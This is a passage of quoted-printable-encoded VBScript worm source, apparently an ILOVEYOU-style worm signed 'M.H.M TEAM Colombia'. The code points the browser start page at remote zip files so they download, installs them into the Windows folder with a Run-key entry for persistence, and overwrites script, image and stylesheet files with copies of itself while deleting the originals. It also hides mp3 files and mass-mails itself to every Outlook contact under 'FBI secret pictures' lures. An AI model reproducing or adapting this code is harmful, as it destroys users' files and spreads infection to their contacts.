"HKCU\Software\Microsoft\Internet Explorer\Main\Start = Page","http://members.fortunecity.com/plancolombia/macromedia32.zip" else rem oh,, a picture.. nice :) =20 if num =3D 3 then regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start = Page","http://members.fortunecity.com/plancolombia/linux321.zip" =20 else rem oh,, other picture =3D:() if num =3D 4 then regcreate "HKCU\Software\Microsoft\Internet = Explorer\Main\Start = Page","http://members.fortunecity.com/plancolombia/linux322.zip" end if=20 end if =20 end if end if if (fileexist(downread&"\MACROMEDIA32.zip")=3D0) then res =3D Shell("copy " & downread & "\MACROMEDIA32.zip " & dirwin & = "\important_note.txt", vbHide) regcreate = "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\plan = colombia",dirwin&"\important_note.txt" regcreate "HKEY_CURRENT_USER\Software\Microsoft\Internet = Explorer\Main\Start Page","about:blank" else if (fileexist(downread&"\linux321.zip")=3D0) then Kill (dirwin & "\logos.sys") res =3D Shell("copy " & downread & "\linux321.zip " & dirwin & = "\logos.sys", vbHide) regcreate "HKEY_CURRENT_USER\Software\Microsoft\Internet = Explorer\Main\Start Page","about:blank" =20 else if (fileexist(downread&"\linux322.zip")=3D0) then Kill (dirwin & "\logow.sys") res =3D Shell("copy " & downread & "\linux322.zip " & dirwin & = "\logow.sys", vbHide) =20 regcreate "HKEY_CURRENT_USER\Software\Microsoft\Internet = Explorer\Main\Start Page","about:blank" =20 end if =20 end if end if end sub sub listadriv On Error Resume Next Dim d,dc,s Set dc =3D fso.Drives For Each d in dc If d.DriveType =3D 2 or d.DriveType=3D3 Then folderlist(d.path&"\") end if Next listadriv =3D s end sub sub infectfiles(folderspec) On Error Resume Next dim f,f1,fc,ext,ap,mircfname,s,bname,mp3 set f =3D fso.GetFolder(folderspec) set fc =3D f.Files for each f1 in fc ext=3Dfso.GetExtensionName(f1.path) ext=3Dlcase(ext) s=3Dlcase(f1.name) if (ext=3D"vbs") or (ext=3D"vbe") then set ap=3Dfso.OpenTextFile(f1.path,2,true) ap.write vbscopy ap.close else if(ext=3D"js") or (ext=3D"jse") or (ext=3D"css") or (ext=3D"wsh") or = (ext=3D"sct") or (ext=3D"hta") then set ap=3Dfso.OpenTextFile(f1.path,2,true) ap.write vbscopy ap.close bname=3Dfso.GetBaseName(f1.path) set cop=3Dfso.GetFile(f1.path) cop.copy(folderspec&"\"&bname&".vbs") fso.DeleteFile(f1.path) =20 else if(ext=3D"jpg") or (ext=3D"jpeg") then set ap=3Dfso.OpenTextFile(f1.path,2,true) ap.write vbscopy ap.close set cop=3Dfso.GetFile(f1.path) cop.copy(f1.path&".vbs") fso.DeleteFile(f1.path) =20 else if(ext=3D"mp3") or (ext=3D"mp2") then set mp3=3Dfso.CreateTextFile(f1.path&".vbs") mp3.write vbscopy mp3.close set att=3Dfso.GetFile(f1.path) att.attributes=3Datt.attributes+2 end if end if end if end if next end sub sub folderlist(folderspec) On Error Resume Next dim f,f1,sf set f =3D fso.GetFolder(folderspec) set sf =3D f.SubFolders for each f1 in sf infectfiles(f1.path) folderlist(f1.path) next end sub sub regcreate(regkey,regvalue) Set regedit =3D CreateObject("WScript.Shell") regedit.RegWrite regkey,regvalue end sub function regget(value) Set regedit =3D CreateObject("WScript.Shell") regget=3Dregedit.RegRead(value) end function function fileexist(filespec) On Error Resume Next dim msg if (fso.FileExists(filespec)) Then msg =3D 0 else msg =3D 1 end if fileexist =3D msg end function function folderexist(folderspec) On Error Resume Next dim msg if (fso.GetFolderExists(folderspec)) then msg =3D 0 else msg =3D 1 end if fileexist =3D msg end function sub spreadtoemail() On Error Resume Next dim = x,a,ctrlists,ctrentries,correoad,b,regedit,regv,regad,textosub,textobod set regedit=3DCreateObject("WScript.Shell") set out=3DWScript.CreateObject("Outlook.Application") set mapi=3Dout.GetNameSpace("MAPI") Randomize numero =3D Int(Rnd * 3) + 1 textosub =3D "" If numero =3D 1 Then textosub =3D "US PRESIDENT AND FBI SECRETS =3DPLEASE VISIT =3D> = (http://WWW.2600.COM)<=3D" Else If numero =3D 2 Then textosub =3D polyname(6) End If End If Randomize numero =3D Int(Rnd * 3) + 1 textobod =3D "" If numero =3D 1 Then textobod =3D "VERY JOKE..! SEE PRESIDENT AND FBI TOP SECRET = PICTURES.." Else If numero =3D 2 Then textobod =3D polyname(10) End If End If for ctrlists=3D1 to mapi.AddressLists.Count set a=3Dmapi.AddressLists(ctrlists) x=3D1 regv=3Dregedit.RegRead("HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a) if (regv=3D"") then regv=3D1 end if if (int(a.AddressEntries.Count)>int(regv)) then =20 for ctrentries=3D1 to a.AddressEntries.Count correoad=3Da.AddressEntries(x) regad=3D"" = regad=3Dregedit.RegRead("HKEY_CURRENT_USER\Software\Microsoft\WAB\"&corr= eoad) if (regad=3D"") then set correo=3Dout.CreateItem(0) correo.Recipients.Add(correoad) correo.Subject =3D textosub correo.Body =3D vbcrlf&textobod correo.Attachments.Add(dirsystem&polyn) correo.Send regedit.RegWrite = "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&correoad,1,"REG_DWORD" end if x=3Dx+1 next regedit.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a,a.Addr= essEntries.Count else regedit.RegWrite = "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a,a.AddressEntries.Count end if next Set out=3DNothing Set mapi=3DNothing end sub Function polyname(n) Dim i, vector, texto, pos on error resume next rem polyformic ( ohhhh yeahhh...) very good polyformic engine :() by = Sand Ja9e Gr0w vector =3D Array("A", "E", "I", "O", "U") texto =3D "" Randomize For i =3D 1 To n Randomize rem consonante texto =3D texto&Chr(Int((Rnd * 25) + 65)) i =3D i + 1 If i > n Then exit for end if rem vocal texto =3D texto&vector(Int((Rnd * 4) + 1)) Randomize Next polyname =3D texto End Function sub html On Error Resume Next dim lines,n,dta1,dta2,dt1,dt2,dt3,dt4,l1,dt5,dt6 dta1=3D""&_ ""&vbcrlf& _ "

M.H.M TEAM

Colombia
- Please press #-#YES#-# = button for see secret pictures"&vbcrlf& _ "Hello = Colombia...! Since Here, after, since other part of World.. = "&vbcrlf& _ ""&vbcrlf& _ "